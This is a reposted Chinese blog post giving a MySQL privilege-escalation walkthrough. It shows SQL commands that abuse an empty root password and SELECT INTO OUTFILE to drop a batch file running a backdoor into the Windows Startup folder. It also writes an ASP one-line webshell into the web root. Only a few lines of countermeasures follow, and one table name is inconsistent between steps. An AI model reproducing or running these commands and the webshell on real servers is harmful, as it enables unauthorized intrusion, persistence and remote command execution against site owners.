MYSQL提权技巧

转载 2011年01月21日 13:40:00

转老邪

问题对象:有虚拟主机空间商.网站服务器  
过程:建立一个表→在表中输入我们的提权内容→出表→完成  
1.mysql默认开启3306端口.如果服务器默认密码不设置就是空密码.黑客们就可能利用该弱口令漏洞.来攻击我们的服务器.  
2.如果在得到用户名为:root 密码为:(空密码时候),黑客就可以攻击进我们网站的.答案他们利用导出一句话木马.  
3.黑客可以得到一个webshell然后.查看网站配置信息.就可以找到这个账号和密码.例如inc.php coon.asp等这些文件  
4.虚拟主机提供商,自己给我们的mysql账号和密码.  
一  
创建新表,开机自启动,来得到cmd,其命令如下:  
1:创建一个新的表  
create table hx小龙 (cmd text);  
含义:创建了一个新的表,表名为bycnboytest,表中只存放一个字段,字段名为cmd,为text文本]

二是:运行我们的后门木马之类的东西.大家自己灵活.

insert into hx小龙 values ("(路径)c:/cmd11.exe " );

三:输出表为一个bat的脚本文件  
select * from bycnboytest into outfile "c://docume~1//alluse~1//「开始」菜单//程序//启动//54td.bat";  
导出一个文件文:54td.bat(c://docume~1//alluse~1//「开始」菜单//程序//启动/此路径才为开机自启动)  
二  
导出一句木马类:  
执行:show databases; 看服务器中有些什么数据库  
use test;进入数据库  
show tables;查看我们进入数据库中有些什么数据表


create table hx小龙123 (cmd text); 创建一个新的表  
insert into hx小龙123 values ("<%execute request("textarea1")%> " );在表中插入一句话木马内容


select * from hx小龙123 into outfile "(导出到网站物理路径如):D:/www/web/54td.asp";

应对措施:  
将上方的启动目录,设置为不可写  
安装关机还原等软件  
网站重要文件进行加密等。

举报

相关文章推荐

实战Linux下三种不同方式的提权技巧

介绍在渗透测试或者漏洞评估的过程中,提权是非常重要的一步,在这一步,黑客和安全研究人员常常通过exploit,bug,错误配置来提升权限。本文的例子都是在虚拟机里测试的,不同的虚拟机可以从Vulnhu...

虚拟主机提权技巧:调用远程路径去执行CMD

摘要:是否大家遇到虚拟主机提权的时候,有这种情况,不管你写哪都提示的 拒绝访问? 原因大多数是麦咖啡的一个功能,只让特定的目录可以执行程序,比如(c:\progra~1和c:\windows\syst...

我是如何成为一名python大咖的?

人生苦短,都说必须python,那么我分享下我是如何从小白成为Python资深开发者的吧。2014年我大学刚毕业..

各种提权、渗透经验技巧总结大全(上)

旁站路径问题: 1、读网站配置。 2、用以下VBS:   On Error Resume Next If (LCase(Right(WScript.Fullnam...

Windows渗透与提权:技巧总结篇

旁站路径问题: 1、读网站配置。 2、用以下VBS: On Error Resume Next If (LCase(Right(WScript.Fullname, 11)) = "wsc...

一个linux的提权技巧

注:这篇文章最早在xiaoyu的百度空间看到过,今天又在51cto看到了,顺手转过来,属于一种较通用的提权方法,转自http://www.51cto.com/art/200907/139210.htm...
  • hrayha
  • hrayha
  • 2015-06-25 18:29
  • 1233

Linux渗透与提权:技巧总结篇

本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍。 Linux 系统下的一些常见路径: /etc/passwd /e...
返回顶部
收藏助手
不良信息举报
您举报文章:深度学习:神经网络中的前向传播和反向传播算法推导
举报原因:
原因补充:

(最多只允许输入30个字)